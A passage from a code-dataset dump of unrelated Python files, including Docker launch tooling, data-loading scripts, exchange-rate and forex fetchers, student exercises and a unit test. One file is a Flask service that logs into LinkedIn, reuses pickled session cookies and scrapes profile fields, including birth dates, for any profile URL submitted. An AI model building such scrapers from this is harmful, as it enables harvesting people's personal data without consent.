'../data/wc-adjustments.xlsx'\nresults_file = '../data/DOD_graded_results_CW_200826.xlsx'\n\n\n\"\"\" establish database connection \"\"\"\nconn = sqlite3.connect(db)\n\n\n\"\"\" load master logsheet, subject dimensions, and WC adjustments \"\"\"\nls = readls(logsheet)\nsub_dim = pd.read_excel(sub_dim_file).iloc[:,:-1]\nwc_adj = pd.read_excel(wc_adj_file, sheet_name = 'adj_stats')\nresults = pd.read_excel(results_file)\n\n\n\"\"\" upload logsheet, subject dimensions, WC adjustments, and results files to database \"\"\"\nls.to_sql('logsheet', conn, if_exists='replace', index=False)\nsub_dim.to_sql('subject_dimensions', conn, if_exists='replace', index=False)\nwc_adj.to_sql('wheelchair_adjustments', conn, if_exists='replace', index=False)\nresults.to_sql('results', conn, if_exists='replace', index=False)\n\n\n\"\"\" load digitized and force data \"\"\"\n# intialzie table_data\ntable_data = None\n# change folder to where data is stored\nos.chdir('../data/subject_data')\n# loop through each file\nfor file in glob.glob('*.xlsx'):\n data_digi = pd.read_excel(file).iloc[:,:9]\n data_jointkin = pd.read_excel(file).iloc[:,9:]\n data_angle = pd.read_excel(file, sheet_name = \"Sheet2\")\n data_rf = pd.read_excel(file, sheet_name = \"Sheet3\")\n data_full = pd.read_excel(file, sheet_name = \"Sheet4\")\n # find cycle info\n sub = '{:02}'.format(int(''.join(filter(str.isdigit, file[:7]))))\n sess = ''.join(filter(str.isdigit, file[10:18]))\n cond = ''.join(filter(str.isdigit, file[22:28]))\n trial = '{:02}'.format(int(''.join(filter(str.isdigit, file[28:37]))))\n cycle = '{:02}'.format(int(''.join(filter(str.isdigit, file[36:]))))\n \"\"\" upload all data to database \"\"\"\n data_digi.to_sql('digi_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n data_jointkin.to_sql('jkin_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n data_angle.to_sql('angle_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n data_rf.to_sql('force_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n data_full.to_sql('fulldata_' + sub + sess + cond + trial + cycle, conn, if_exists='replace')\n \"\"\" add data info to list of tables \"\"\"\n if table_data is None:\n table_data = pd.DataFrame({'subject_id': [int(sub)],\n 'session': [int(sess)],\n 'condition': [int(cond)],\n 'trial': [int(trial)],\n 'cycle': [int(cycle)],\n 'digi': ['digi_' + sub + sess + cond + trial + cycle],\n 'force': ['force_' + sub + sess + cond + trial + cycle],\n 'angle': ['angle_' + sub + sess + cond + trial + cycle],\n 'fulldata': ['fulldata_' + sub + sess + cond + trial + cycle]})\n else:\n table_data = table_data.append(pd.DataFrame({'subject_id': [int(sub)],\n 'session': [int(sess)],\n 'condition': [int(cond)],\n 'trial': [int(trial)],\n 'cycle': [int(cycle)],\n 'digi': ['digi_' + sub + sess + cond + trial + cycle],\n 'force': ['force_' + sub + sess + cond + trial + cycle],\n 'angle': ['angle_' + sub + sess + cond + trial + cycle],\n 'fulldata': ['fulldata_' + sub + sess + cond + trial + cycle]})).reset_index(drop=True)\n \n# return to original folder\nos.chdir('../..')\n# upload table_data\ntable_data.to_sql('table_list', conn, if_exists='replace', index=False)\n\n\n\"\"\" close connection \"\"\"\nconn.close()\n","sub_path":"codes/data2database.py","file_name":"data2database.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"592352253","text":"import getpass\nimport json\nimport logging\nimport os\nimport posixpath\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom typing import Any, Dict, List, Optional, Sequence, Union\n\n\nfrom docker.models.resource import Model # type: ignore\nfrom dockerpycreds.utils import find_executable # type: ignore\nfrom six.moves import shlex_quote\nimport wandb\nfrom wandb.apis.internal import Api\nfrom wandb.env import DOCKER\nfrom wandb.errors import ExecutionError, LaunchError\nfrom wandb.util import get_module\n\nfrom . import _project_spec\nfrom .utils import _is_wandb_dev_uri, _is_wandb_local_uri\nfrom ..lib.git import GitRepo\n\n_logger = logging.getLogger(__name__)\n\n_GENERATED_DOCKERFILE_NAME = \"Dockerfile.wandb-autogenerated\"\n_PROJECT_TAR_ARCHIVE_NAME = \"wandb-project-docker-build-context\"\n\n\ndef validate_docker_installation() -> None:\n \"\"\"Verify if Docker is installed on host machine.\"\"\"\n if not find_executable(\"docker\"):\n raise ExecutionError(\n \"Could not find Docker executable. \"\n \"Ensure Docker is installed as per the instructions \"\n \"at https://docs.docker.com/install/overview/.\"\n )\n\n\ndef validate_docker_env(launch_project: _project_spec.LaunchProject) -> None:\n \"\"\"Ensure project has a docker image associated with it.\"\"\"\n if not launch_project.docker_image:\n raise ExecutionError(\n \"LaunchProject with docker environment must specify the docker image \"\n \"to use via 'docker_image' field.\"\n )\n\n\ndef generate_docker_image(\n launch_project: _project_spec.LaunchProject, entry_cmd: str\n) -> str:\n \"\"\"Uses project and entry point to generate the docker image.\"\"\"\n path = launch_project.project_dir\n # this check will always pass since the dir attribute will always be populated\n # by _fetch_project_local\n get_module(\n \"repo2docker\",\n required='wandb launch requires additional dependencies, install with pip install \"wandb[launch]\"',\n )\n assert isinstance(path, str)\n cmd: Sequence[str] = [\n \"jupyter-repo2docker\",\n \"--no-run\",\n \"--user-id={}\".format(launch_project.docker_user_id),\n path,\n '\"{}\"'.format(entry_cmd),\n ]\n\n _logger.info(\n \"Generating docker image from git repo or finding image if it already exists..........\"\n )\n wandb.termlog(\"Generating docker image, this may take a few minutes\")\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stderr = \"\"\n # this will always pass, repo2docker writes to stderr.\n assert process.stderr\n for line in process.stderr:\n decoded_line = line.decode(\"utf-8\")\n if decoded_line.endswith(\"\\n\"):\n decoded_line = decoded_line.rstrip(\"\\n\")\n print(decoded_line) # don't spam termlog with all this\n stderr = stderr + decoded_line\n process.wait()\n image_id: List[str] = re.findall(r\"Successfully tagged (.+):latest\", stderr)\n if not image_id:\n image_id = re.findall(r\"Reusing existing image \\((.+)\\)\", stderr)\n if not image_id:\n raise LaunchError(\"error running repo2docker: {}\".format(stderr))\n os.environ[DOCKER] = image_id[0]\n return image_id[0]\n\n\ndef pull_docker_image(docker_image: str) -> None:\n \"\"\"Pulls the requested docker image.\"\"\"\n import docker # type: ignore\n\n info = docker_image.split(\":\")\n client = docker.from_env()\n try:\n if len(info) == 1:\n client.images.pull(info[0])\n else:\n client.images.pull(info[0], tag=info[1])\n except docker.errors.APIError as e:\n raise LaunchError(\"Docker server returned error: {}\".format(e))\n\n\ndef build_docker_image(\n launch_project: _project_spec.LaunchProject, base_image: str, copy_code: bool,\n) -> Union[Model, Any]:\n \"\"\"Build a docker image containing the project in `work_dir`, using the base image.\n\n Arguments:\n launch_project: LaunchProject class instance\n base_image: base_image to build the docker image off of\n api: instance of wandb.apis.internal Api\n copy_code: boolean indicating if code should be copied into the docker container\n\n Returns:\n A `Model` instance of the docker image.\n\n Raises:\n LaunchError: if there is an issue communicating with the docker client\n \"\"\"\n import docker\n\n image_name = \"wandb_launch_{}\".format(launch_project.run_id)\n image_uri = _get_docker_image_uri(\n name=image_name, work_dir=launch_project.project_dir\n )\n copy_code_line = \"\"\n workdir_line = \"\"\n copy_config_line = \"\"\n workdir = os.path.join(\"/home/\", getpass.getuser())\n if launch_project.override_config:\n copy_config_line = \"COPY {}/{} {}\\n\".format(\n _PROJECT_TAR_ARCHIVE_NAME, _project_spec.DEFAULT_CONFIG_PATH, workdir\n )\n if copy_code:\n copy_code_line = \"COPY {}/ {}\\n\".format(_PROJECT_TAR_ARCHIVE_NAME, workdir)\n workdir_line = \"WORKDIR {}\\n\".format(workdir)\n name_line = \"\"\n if launch_project.name:\n name_line = \"ENV WANDB_NAME={wandb_name}\\n\"\n\n dockerfile = (\n \"FROM {imagename}\\n\"\n \"{copy_config_line}\"\n \"{copy_code_line}\"\n \"{workdir_line}\"\n \"{name_line}\"\n ).format(\n imagename=base_image,\n copy_config_line=copy_config_line,\n copy_code_line=copy_code_line,\n workdir_line=workdir_line,\n name_line=name_line,\n )\n build_ctx_path = _create_docker_build_ctx(\n launch_project.project_dir,\n dockerfile,\n launch_project._runtime,\n launch_project.override_config,\n )\n with open(build_ctx_path, \"rb\") as docker_build_ctx:\n _logger.info(\"=== Building docker image %s ===\", image_uri)\n # TODO: replace with shelling out\n dockerfile = posixpath.join(\n _PROJECT_TAR_ARCHIVE_NAME, _GENERATED_DOCKERFILE_NAME\n )\n # TODO: remove the dependency on docker / potentially just do the append builder\n # found at: https://github.com/google/containerregistry/blob/master/client/v2_2/append_.py\n client = docker.from_env()\n try:\n image, _ = client.images.build(\n tag=image_uri,\n forcerm=True,\n dockerfile=dockerfile,\n fileobj=docker_build_ctx,\n custom_context=True,\n encoding=\"gzip\",\n )\n except ConnectionError as e:\n raise LaunchError(\"Error communicating with docker client: {}\".format(e))\n\n try:\n os.remove(build_ctx_path)\n except Exception:\n _logger.info(\n \"Temporary docker context file %s was not deleted.\", build_ctx_path\n )\n return image\n\n\ndef get_docker_command(\n image: Union[Model, Any],\n launch_project: _project_spec.LaunchProject,\n api: Api,\n docker_args: Dict[str, Any] = None,\n) -> List[str]:\n \"\"\"Constructs the docker command using the image and docker args.\n\n Arguments:\n image: a Docker image to be run\n launch_project: an instance of LaunchProject\n api: an instance of wandb.apis.internal Api\n docker_args: a dictionary of additional docker args for the command\n \"\"\"\n docker_path = \"docker\"\n cmd: List[Any] = [docker_path, \"run\", \"--rm\"]\n\n if _is_wandb_local_uri(api.settings(\"base_url\")) and sys.platform == \"darwin\":\n _, _, port = _, _, port = api.settings(\"base_url\").split(\":\")\n base_url = \"http://host.docker.internal:{}\".format(port)\n elif _is_wandb_dev_uri(api.settings(\"base_url\")):\n base_url = \"http://host.docker.internal:9002\"\n else:\n base_url = api.settings(\"base_url\")\n\n cmd += [\n \"--env\",\n f\"WANDB_BASE_URL={base_url}\",\n \"--env\",\n f\"WANDB_API_KEY={api.api_key}\",\n \"--env\",\n f\"WANDB_PROJECT={launch_project.target_project}\",\n \"--env\",\n f\"WANDB_ENTITY={launch_project.target_entity}\",\n \"--env\",\n f\"WANDB_LAUNCH={True}\",\n \"--env\",\n f\"WANDB_LAUNCH_CONFIG_PATH={_project_spec.DEFAULT_CONFIG_PATH}\",\n \"--env\",\n f\"WANDB_RUN_ID={launch_project.run_id or None}\",\n \"--env\",\n f\"WANDB_DOCKER={launch_project.docker_image}\",\n ]\n\n if docker_args:\n for name, value in docker_args.items():\n # Passed just the name as boolean flag\n if isinstance(value, bool) and value:\n if len(name) == 1:\n cmd += [\"-\" + name]\n else:\n cmd += [\"--\" + name]\n else:\n # Passed name=value\n if len(name) == 1:\n cmd += [\"-\" + name, value]\n else:\n cmd += [\"--\" + name, value]\n\n cmd += [image.tags[0]]\n return [shlex_quote(c) for c in cmd]\n\n\ndef _get_docker_image_uri(name: str, work_dir: str) -> str:\n \"\"\"Returns a Docker image URI based on the git hash of the specified working directory.\n\n Arguments:\n name: The URI of the Docker repository with which to tag the image. The\n repository URI is used as the prefix of the image URI.\n work_dir: Path to the working directory in which to search for a git commit hash\n \"\"\"\n name = name.replace(\" \", \"-\") if name else \"docker-project\"\n # Optionally include first 7 digits of git SHA in tag name, if available.\n\n git_commit = GitRepo(work_dir).last_commit\n version_string = \":\" + str(git_commit[:7]) if git_commit else \"\"\n return name + version_string\n\n\ndef _create_docker_build_ctx(\n work_dir: str,\n dockerfile_contents: str,\n runtime: Optional[str],\n run_config: Dict[str, Any],\n) -> str:\n \"\"\"Creates build context tarfile containing Dockerfile and project code, returning path to tarfile.\"\"\"\n directory = tempfile.mkdtemp()\n try:\n dst_path = os.path.join(directory, \"wandb-project-contents\")\n shutil.copytree(src=work_dir, dst=dst_path)\n if run_config:\n config_path = os.path.join(dst_path, _project_spec.DEFAULT_CONFIG_PATH)\n with open(config_path, \"w\") as fp:\n json.dump(run_config, fp)\n if runtime:\n runtime_path = os.path.join(dst_path, \"runtime.txt\")\n with open(runtime_path, \"w\") as fp:\n fp.write(runtime)\n\n with open(os.path.join(dst_path, _GENERATED_DOCKERFILE_NAME), \"w\") as handle:\n handle.write(dockerfile_contents)\n _, result_path = tempfile.mkstemp()\n wandb.util.make_tarfile(\n output_filename=result_path,\n source_dir=dst_path,\n archive_name=_PROJECT_TAR_ARCHIVE_NAME,\n )\n finally:\n shutil.rmtree(directory)\n return result_path\n","sub_path":"wandb/sdk/launch/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"538149585","text":"def solicitaInteiro(iterator):\n valor = \"Digite \" + str(iterator) + \"º número: \" \n num = input(valor)\n try:\n num = int(num)\n valor = \"O \" + str(iterator) + \"º número informado foi [\"\n print(valor, num, \"]\")\n return num\n except:\n print(\"Não é um número válido.\")\n exit()\n\nquantidade = [1,2]\nvalor = 0\nfor iterator in quantidade:\n valor += solicitaInteiro(iterator)\n\nprint(\"Soma:\", valor)","sub_path":"semana1/estrutura-sequencial/exercicio03.py","file_name":"exercicio03.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"299974633","text":"from flask import Flask, request, jsonify,render_template\n\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pickle\n\nimport json\nimport os\nfrom os import path\nimport re\n\n\nLINKEDIN_MAIL = os.environ.get(\"LINKEDIN_MAIL\")\nLINKEDIN_PASSWORD = os.environ.get(\"LINKEDIN_PASSWORD\")\n\napp = Flask(__name__)\n\n\nSERVER_ERROR = [{\"server-error\":\"can't establish connection ,try again, after some time\"}]\nSERVER_ERROR_DATA = [{\"server-error\":\"failed to fetch data, try again, after some time\"}]\ndef save_cookies(requests_cookiejar):\n filename='cookies'\n with open(filename, 'wb') as f:\n pickle.dump(requests_cookiejar, f)\n\ndef load_cookies(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\ndef login_linkedin():\n client = requests.Session()\n HOMEPAGE_URL = 'https://www.linkedin.com'\n LOGIN_URL = 'https://www.linkedin.com/uas/login-submit'\n html = client.get(HOMEPAGE_URL).content\n soup = BeautifulSoup(html, \"html.parser\")\n try:\n csrf = soup.find('input', dict(name='loginCsrfParam'))['value']\n except:\n return \"csrf :error\"\n\n try:\n login_information = {\n 'session_key':LINKEDIN_MAIL,\n 'session_password':LINKEDIN_PASSWORD,\n 'loginCsrfParam': csrf,\n }\n client.post(LOGIN_URL, data=login_information)\n save_cookies(client.cookies)\n except:\n return \"login:error\"\n return \"success\"\n\ndef scrapper(link,user_req_data):\n if not path.exists('cookies'):\n login = login_linkedin()\n if login == \"success\":\n pass\n else:\n print(\"Linkedin : Failed to Login\")\n return(SERVER_ERROR)\n url = link\n html = requests.get(url,cookies=load_cookies('cookies'))\n if not html.status_code == 200:\n login = login_linkedin()\n html = requests.get(url,cookies=load_cookies('cookies'))\n if not login == \"success\" or not html.status_code == 200:\n return(SERVER_ERROR)\n soup = BeautifulSoup(html.content , \"html.parser\")\n data = soup.find_all('code')\n if data == []:\n return(SERVER_ERROR_DATA)\n found = False\n req_data = {}\n for element in data:\n json_object = element.get_text()\n try:\n dict_from_json = json.loads(json_object)\n if 'included' in dict_from_json.keys():\n for values in dict_from_json['included']:\n if 'birthDateOn' in values.keys():\n found = True\n req_data = values\n break\n if found:\n break\n except:\n pass\n\n resp = [{}]\n if found:\n try:\n resp = [{\n user_req_data : req_data[user_req_data]\n }]\n except:\n pass\n return resp\n\n@app.route('/api/v1/linkedin/', methods=('GET', 'POST'))\ndef respond():\n if request.method == 'POST':\n req_data = request.form['data']\n link = request.form['url']\n link_regex = re.compile('((http(s?)://)*([a-zA-Z0-9\\-])*\\.|[linkedin])[linkedin/~\\-]+\\.[a-zA-Z0-9/~\\-_,&=\\?\\.;]+[^\\.,\\s<]')\n validate = link_regex.match(link)\n if validate is None:\n resp = [{\n \"invalid_link\" : link + \"- please check your link one more time and try agian\"\n }]\n return jsonify(resp)\n resp = scrapper(link,req_data)\n if resp == [{}]:\n resp = [{\n \"No requested data found\" : req_data + \"- please try again with the keywords headline/firstName/lastName/summary\"\n }]\n return jsonify(resp)\n\n return render_template('api.html')\n\n\n\nif __name__ == '__main__':\n # Threaded option to enable multiple instances for multiple user access support\n app.run(threaded=True, port=5000)\n","sub_path":"local/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571299809","text":"__author__ = 'clarksj4 & camertp1'\n\nimport writer\nimport cherrypy\nimport sys\nlib_path = '..'\nsys.path.append(lib_path)\nimport slacker_config\n\n\"\"\"\n WriterSvc:\n Receives .json from UI contains { \"session_key\": \"sdfh467sdf13423d\", \"body\": \"Hello World!\", \"channel_id\": \"1\" }\n\n Make sure .json is in correct format. If not, POST error msg to UI\n\n get session_key from .json\n\n send session_key to authorization svc - POST\n\n POST to auth shall return .json containing user_id : { \"user_id\": \"39837124\"}\n\n create .json containing: { \"channel_id\": \"1\", \"user_id\": \"39837124\", \"body\": \"Hello World!\" }\n\n POST new .json to channel svc\n\n check return value of POST\n POST error to UI in case of error\n\"\"\"\n\nclass WriterSvc:\n exposed = True\n\n @cherrypy.tools.json_out()\n @cherrypy.tools.json_in()\n def POST(self):\n json = cherrypy.request.json\n try:\n session_key = json['session_key']\n channel_id = json['channel_id']\n body = json['body']\n\n except IndexError:\n return {'error': 'failed'}\n\n auth_resp = writer.Writer.send({'session_key': session_key}, url['auth'] + \":\" + port['auth'])\n\n if auth_resp.get('error'):\n return {'error': 'failed'}\n else:\n channel_resp = writer.Writer.send({'new_msg': {'channel_id': channel_id,\n 'user_id': auth_resp['user_id'],\n 'message_string': body}},\n url['channels'] + \":\" + port['channels'])\n\n if channel_resp.get('error'):\n return {'error': 'failed'}\n else:\n return {'success message': 'blargh'}\n\n\nif __name__ == '__main__':\n conf = {\n '/': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'application/json')],\n }\n }\n cherrypy.config.update({'server.socket_port': port['msg_writer']})\n cherrypy.quickstart(WriterSvc(), '/', conf)","sub_path":"WriteSvc/write_svc.py","file_name":"write_svc.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"419033180","text":"# Starter code for Homework 4\n\n# %%\n# Import the modules we will use\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# %%\n# ** MODIFY **\n# Set the file name and path to where you have stored the data\nfilename = 'streamflow_week4.txt'\nfilepath = os.path.join('data', filename)\nprint(os.getcwd())\nprint(filepath)\n\n# %%\n# DON'T change this part -- this creates the lists you \n# should use for the rest of the assignment\n# no need to worry about how this is being done now we will cover\n# this in later sections. \n\n#Read the data into a pandas dataframe\ndata=pd.read_table(filepath, sep = '\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']\n )\n\n# Expand the dates to year month day\ndata[[\"year\", \"month\", \"day\"]] =data[\"datetime\"].str.split(\"-\", expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\n\n# Make a numpy array of this data\nflow_data = data[['year', 'month','day', 'flow']].to_numpy()\n\n# Getting rid of the pandas dataframe since we wont be using it this week\ndel(data)\n\n# %%\n# Starter Code\n# Count the number of values with flow > 600 and month ==7\nflow_count = np.sum((flow_data[:,3] > 600) & (flow_data[:,1]==7))\n\n# Calculate the average flow for these same criteria \nflow_mean = np.mean(flow_data[(flow_data[:,3] > 600) & (flow_data[:,1]==7),3])\n\nprint(\"Flow meets this critera\", flow_count, \" times\")\nprint('And has an average value of', flow_mean, \"when this is true\")\n\n# Make a histogram of data\n# Use the linspace funciton to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=15)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15) \n#Plotting the histogram\nplt.hist(flow_data[:,3], bins = mybins)\nplt.title('Streamflow')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\n\n# Get the quantiles of flow\n# Two different approaches --- you should get the same answer\n# just using the flow column\nflow_quants1 = np.quantile(flow_data[:,3], q=[0,0.1, 0.5, 0.9])\nprint('Method one flow quantiles:', flow_quants1)\n# Or computing on a colum by column basis \nflow_quants2 = np.quantile(flow_data, q=[0,0.1, 0.5, 0.9], axis=0)\n# and then just printing out the values for the flow column\nprint('Method two flow quantiles:', flow_quants2[:,3])\n# %%\n# Starting 'my code'\n# print(data)\n# print(flow_count)\nprint(flow_data)\nprint(flow_mean)\nprint(flow_data.size)\nprint(flow_data.shape)\n# %%\n#Testing\n#take flows and compare similar years\n# flow_year = flow_data[:,0]\n# flow_month = flow_data[:,1]\n# flow_flow = flow_data[:,3]\n# print(flow_year)\n# flow_data2 = np.flow_data(flow_data[:,0]flow_data[:,1],\n# test1 = np.append(flow_data[:,0], flow_data[:,1])\n# print(test1)\n\n# del(test1)# %%\n\n# for flow_data[:,1] == 9 in flow_data:\n# print(flow_data[:,2])\n\n# for i in flow_data:\n# if flow_data.any[:,1] == 9:\n# print(flow_data[:,3])\n\n# year = \n\n# flow_data2 = flow_data[(flow_data[:,1]==9), 3]\n# yr1 = flow_data2[1:30]\n\n# print(flow_data2)\n\n# flow_data.index(flow_data[:,1] == 9)\n\n# print(flow_data[:,1] == 9 for flow_data[:,3])\n\n# %%\n# Monday Guess!\nprint(flow_data.size)\nprint(flow_data.shape)\nflow_202009 = flow_data[11571:11585, 3]\nprint(flow_202009)\n\nx = [6.,7,8,9,10,11,12,13,14,15,16,17,18,19]\nfig9 = plt.figure()\nfig9.patch.set_facecolor('xkcd:mint green')\nplt.plot(x, flow_202009)\nplt.xlabel('days in September 2020')\nplt.ylabel('flow')\nplt.legend()\nplt.savefig('graphs/flow_202009')\n#%%\n# Make a histogram of data for month 9\nflow_data9 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==9), 3]\nmean9 = np.mean(flow_data9)\nprint(mean9)\n# Use the linspace funciton to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15) \n#Plotting the histogram\nfig9 = plt.figure()\nfig9.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data9[:], bins = mybins)\nplt.title('Streamflow_9')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g9')\n# %%\n# Make a histogram of data for month 10\nflow_data10 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==10), 3]\nmean10 = np.mean(flow_data10)\nprint(mean10)\n# Use the linspace funciton to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15) \n#Plotting the histogram\nfig10 = plt.figure()\nfig10.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data10[:], bins = mybins)\nplt.title('Streamflow_10')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g10')\n# %%\n# %%\n# Make a histogram of data for month 11\nflow_data11 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==11), 3]\nmean11 = np.mean(flow_data11)\nprint(mean11)\n# Use the linspace funciton to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15) \n#Plotting the histogram\nfig11 = plt.figure()\nfig11.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data11[:], bins = mybins)\nplt.title('Streamflow_11')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g11')\n# %%\n# Make a histogram of data for month 12\nflow_data12 = flow_data[(flow_data[:,3] < 400) & (flow_data[:,1]==12), 3]\nmean12 = np.mean(flow_data12)\nprint(mean12)\n# Use the linspace funciton to create a set of evenly spaced bins\nmybins = np.linspace(0, 1000, num=25)\n# another example using the max flow to set the upper limit for the bins\n#mybins = np.linspace(0, np.max(flow_data[:,3]), num=15) \n#Plotting the histogram\nfig12 = plt.figure()\nfig12.patch.set_facecolor('xkcd:mint green')\nplt.hist(flow_data12[:], bins = mybins)\nplt.title('Streamflow_12')\nplt.xlabel('Flow [cfs]')\nplt.ylabel('Count')\nplt.savefig('graphs/g12')\n# %%\n","sub_path":"assignment_4/Mitchell_HW4.py","file_name":"Mitchell_HW4.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"178647544","text":"# coding: utf-8\n# 概要\n# 通過情報をAPIを利用して取得する\n################ 変更履歴 ######################\n## 2017/09/13 作成\n\n###############################################\n\nimport itertools\nfrom datetime import datetime\nimport math\nimport os\nimport configparser\nimport sys\nimport urllib.request\nimport json\nclass ForgeApi(object):\n\t# 初期化処理\n\tdef __init__(self,dict):\n\t\t# 環境変数を取得する。\n\t\tself.homeDir = os.environ[\"APPMONEYTRADE\"]\n\n\t\t# iniconfigファイルを読み出す。\n\t\tself.inifile = dict['util'].inifile\n\n\t\t# 機能ID\n\t\tself.pid = dict['pid']\n\t\tself.utilClass = dict['util']\n\t\t\n\n\t# 全ての通貨ペアの値段を取得する。\n\tdef quotesApi(self,key,timeout=7):\n\t\t# 全ての通貨ペアの値段を取得する。\n\t\tparelist = self.inifile.get('moneypare','moneypare')\t\n\t\tdata = {}\n\t\tdata['pairs'] = parelist\n\t\tdata['api_key'] = key\n\t\turl_values = urllib.parse.urlencode(data)\n\t\treq = urllib.request.Request(\"https://forex.1forge.com/1.0.3/quotes?\" + url_values,headers={'User-Agent': 'Mozilla/5.0'})\n\n\t\t# responseの初期値を取得する。\n\t\tresponse = 0\n\t\t# HTTPとかタイムアウト時の処理\n\t\ttry:\n\t\t\twith urllib.request.urlopen(req,timeout=7) as res:\n\t\t\t\tresponse = res.read().decode(\"utf-8\")\n\t\texcept:\n\t\t\tself.utilClass.loggingError('quotesApi is HttpError')\n\n\t\treturn response\n","sub_path":"source/service/forge/ForgeApi.py","file_name":"ForgeApi.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"627480602","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nurl = 'https://rate.bot.com.tw/xrt/quote/2020-07/USD'\r\nresponse = requests.get(url).text\r\nsoup = BeautifulSoup(response, features='html.parser')\r\ntr_tags = soup.find_all('tbody')[0].find_all('tr')\r\n\r\nall_days = [['時間','本行買入','本行賣出','即期買入','即期賣出']]\r\nfor tag in tr_tags:\r\n data = tag.text\r\n info = data.split('\\n')[1:-1]\r\n info.pop(1)\r\n all_days.insert(1,info)\r\n\r\nimport csv\r\nfilename = 'rate.csv'\r\nwith open(filename, encoding='Big5', mode='w') as csvfile:\r\n writer = csv.writer(csvfile)\r\n writer.writerows(all_days)\r\n","sub_path":"Day15/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"68468360","text":"import unittest\nfrom client3 import getDataPoint, getRatio\n\n\nclass ClientTest(unittest.TestCase):\n\n def test_getDataPoint_calculatePrice(self):\n quotes = [\n {\n \"top_ask\": {\n \"price\": 121.2,\n \"size\": 36\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 120.48,\n \"size\": 109\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"ABC\",\n },\n {\n \"top_ask\": {\n \"price\": 121.68,\n \"size\": 4\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 117.87,\n \"size\": 81\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"DEF\",\n },\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n quote0 = \"ABC\", 120.48, 121.2, (120.48 + 121.2) / 2\n\n self.assertEqual(getDataPoint(quotes[0]), quote0)\n\n def test_getDataPoint_calculatePriceBidGreaterThanAsk(self):\n quotes = [\n {\n \"top_ask\": {\n \"price\": 119.2,\n \"size\": 36\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 120.48,\n \"size\": 109\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"ABC\",\n },\n {\n \"top_ask\": {\n \"price\": 121.68,\n \"size\": 4\n },\n \"timestamp\": \"2019-02-11 22:06:30.572453\",\n \"top_bid\": {\n \"price\": 117.87,\n \"size\": 81\n },\n \"id\": \"0.109974697771\",\n \"stock\": \"DEF\",\n },\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n for quote in quotes:\n expectedResult = (\n quote[\"stock\"],\n quote[\"top_bid\"][\"price\"],\n quote[\"top_ask\"][\"price\"],\n round(((quote[\"top_bid\"][\"price\"] + quote[\"top_ask\"][\"price\"]) / 2),\n 2),\n )\n self.assertEqual(getDataPoint(quote), expectedResult)\n\n \"\"\" ------------ Add more unit tests ------------ \"\"\"\n\n def test_getRatio_calculateRatioAgainstAZeroPrice(self):\n self.assertEqual(getRatio(100, 0), False)\n\n def test_getRatio_caclulateRatioOnFirstPriceZero(self):\n self.assertEqual(getRatio(0, 